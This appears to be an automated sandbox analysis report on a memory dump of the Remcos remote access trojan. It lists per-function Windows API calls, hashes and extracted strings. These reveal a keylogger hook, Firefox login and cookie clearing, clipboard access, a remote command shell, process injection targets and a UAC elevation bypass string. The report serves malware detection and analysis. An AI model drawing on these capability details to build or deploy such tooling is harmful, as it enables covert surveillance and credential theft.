                                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                              • API String ID: 1067849700-181434739
                                                              • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                              • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                              • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                              • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                              • CloseHandle.KERNEL32 ref: 00405A23
                                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                                              • CloseHandle.KERNEL32 ref: 00405A45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                              • API String ID: 2994406822-18413064
                                                              • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                              • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                              • Opcode Fuzzy Hash: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
                                                              • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                              • API String ID: 3018269243-13974260
                                                              • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                              • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                              • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                                              • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                              • API String ID: 1164774033-3681987949
                                                              • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                              • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                              • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                              • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                              APIs
                                                              • OpenClipboard.USER32 ref: 004168FD
                                                              • EmptyClipboard.USER32 ref: 0041690B
                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                              • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                              • CloseClipboard.USER32 ref: 00416990
                                                              • OpenClipboard.USER32 ref: 00416997
                                                              • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                              • String ID: !D@
                                                              • API String ID: 3520204547-604454484
                                                              • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                              • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                              • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                              • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$Close$File$FirstNext
                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 3527384056-432212279
                                                              • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                              • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                              • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                              • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                              • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                              • API String ID: 3756808967-1743721670
                                                              • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                              • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                              • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                              • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                                              • API String ID: 0-1861860590
                                                              • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                              • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                              • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                              • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0040755C
                                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Object_wcslen
                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                              • API String ID: 240030777-3166923314
                                                              • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                              • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                              • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                              • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                              APIs
                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                              • GetLastError.KERNEL32 ref: 0041A84C
                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                              • String ID:
                                                              • API String ID: 3587775597-0
                                                              • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                              • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                              • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                              • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                              • String ID: JD$JD$JD
                                                              • API String ID: 745075371-3517165026
                                                              • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                              • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                              • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                              • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$CloseFile$FirstNext
                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                              • API String ID: 1164774033-405221262
                                                              • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                              • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                              • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                              • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                              • String ID:
                                                              • API String ID: 2341273852-0
                                                              • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                              • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                              • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                              • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$CreateFirstNext
                                                              • String ID: 8SG$PXG$PXG$NG$PG
                                                              • API String ID: 341183262-3812160132
                                                              • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                              • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                              • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                              • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                              • GetLastError.KERNEL32 ref: 0040A328
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                              • TranslateMessage.USER32(?), ref: 0040A385
                                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                                              Strings
                                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                              • String ID: Keylogger initialization failure: error
                                                              • API String ID: 3219506041-952744263
                                                              • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                              • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                              • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                              • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 0040A451
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                              • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                              • GetKeyState.USER32(00000010), ref: 0040A46E
                                                              • GetKeyboardState.USER32(?), ref: 0040A479
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                              • String ID:
                                                              • API String ID: 1888522110-0
                                                              • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                              • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                              • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                              • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                              APIs
                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                              • API String ID: 2127411465-314212984
                                                              • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                              • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                              • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                              • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                              APIs
                                                              • _free.LIBCMT ref: 00449292
                                                              • _free.LIBCMT ref: 004492B6
                                                              • _free.LIBCMT ref: 0044943D
                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                              • _free.LIBCMT ref: 00449609
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                              • String ID:
                                                              • API String ID: 314583886-0
                                                              • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                              • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                              • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                              • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                              APIs
                                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
